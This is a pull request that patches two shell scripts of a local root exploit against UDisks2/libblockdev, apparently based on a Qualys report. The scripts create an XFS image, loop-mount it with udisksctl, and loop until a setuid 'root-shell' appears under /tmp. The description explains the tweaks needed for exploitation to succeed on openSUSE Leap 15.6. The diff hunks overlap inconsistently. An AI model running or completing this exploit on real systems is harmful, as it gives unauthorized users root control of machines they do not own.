### PR TITLE
fix run on openSUSE Leap 15.6

### DIFF
--- a/1.sh
+++ b/1.sh
@@ -2,7 +2,7 @@
 dd if=/dev/zero of=xfs.image bs=1M count=300
 
 # XFS
-mkfs.xfs -f xfs.image
+sudo mkfs.xfs -f xfs.image
 
 sudo mkdir -p /mnt/malicious_image
 

--- a/2.sh
+++ b/2.sh
@@ -8,7 +8,7 @@ gdbus call --system --dest org.freedesktop.login1 --object-path /org/freedesktop
 killall -KILL gvfs-udisks2-volume-monitor &>/dev/null
 
 # loop 设备
-udisksctl loop-setup --file ~/xfs.image
+udisksctl loop-setup --file xfs.image
 
 # 启动后台进程
 while true; do /tmp/blockdev*/root-shell -c 'sleep 5; ls -l /tmp/blockdev*/root-shell' && break; done &>/dev/null &

--- a/2.sh
+++ b/2.sh
@@ -11,7 +11,7 @@ killall -KILL gvfs-udisks2-volume-monitor &>/dev/null
 udisksctl loop-setup --file ~/xfs.image
 
 # 启动后台进程
-while true; do /tmp/blockdev*/root-shell -c 'sleep 5' && break; done &>/dev/null &
+while true; do /tmp/blockdev*/root-shell -c 'sleep 5; ls -l /tmp/blockdev*/root-shell' && break; done &>/dev/null &
 
 # UDisks2 触发漏洞
 gdbus call --system --dest org.freedesktop.UDisks2 \


### PR DESCRIPTION
* openSUSE Leap by default doesn't expose /sbin to normal users.
* The `ls -l` within the busy loop (which was present in the original Qualys report) seems to be essential to the exploitation.
* `~/xfs.image` is a hard-coded path from nowhere.